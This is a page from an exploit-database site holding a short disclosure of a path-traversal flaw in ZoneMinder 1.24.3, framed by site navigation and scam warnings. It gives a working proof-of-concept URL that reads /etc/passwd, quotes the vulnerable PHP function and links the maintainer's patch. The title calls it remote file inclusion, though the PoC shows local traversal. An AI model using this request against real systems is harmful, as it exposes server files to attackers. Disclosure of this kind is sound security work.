0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Zoneminder 1.24.3 Remote File Inclusion Vulnerability
# Exploit Title: Zoneminder 1.24.3 Remote File Inclusion Vulnerability # Author: Iye (iye[dot]cba-at-gmail[dot]com) # Software Link: http://www.zoneminder.com/ # Version: 1.24.3 (Tested). 1.24.4 probably too, not tested # Tested on: Ubuntu 10.04 You must be authenticated as a user in the Web App to exploit it. It's not a must to be admin. POC: http://localhost/zm/index.php?action=56&markMids%5B%5D=1&deleteBtn=Delete&editBtn=Edit&view=../../../../../../../../../../../../../../../etc/passwd%00 Reported to proyect mantainer (Philip Coombes) on 2011-07-22 Fix patch made Philip Coombes: http://www.zoneminder.com/downloads/lfi-patch.txt Vulnerable Code: /var/www/zm/includes/functions.php -------------------------------------------------------- function getSkinFile( $file ) { global $skinBase; $skinFile = false; foreach ( $skinBase as $skin ) { $tempSkinFile = 'skins'.'/'.$skin.'/'.$file; if ( file_exists( $tempSkinFile ) ) $skinFile = $tempSkinFile; } return( $skinFile ); } -------------------------------------------------------- # 0day.today [2024-11-15] #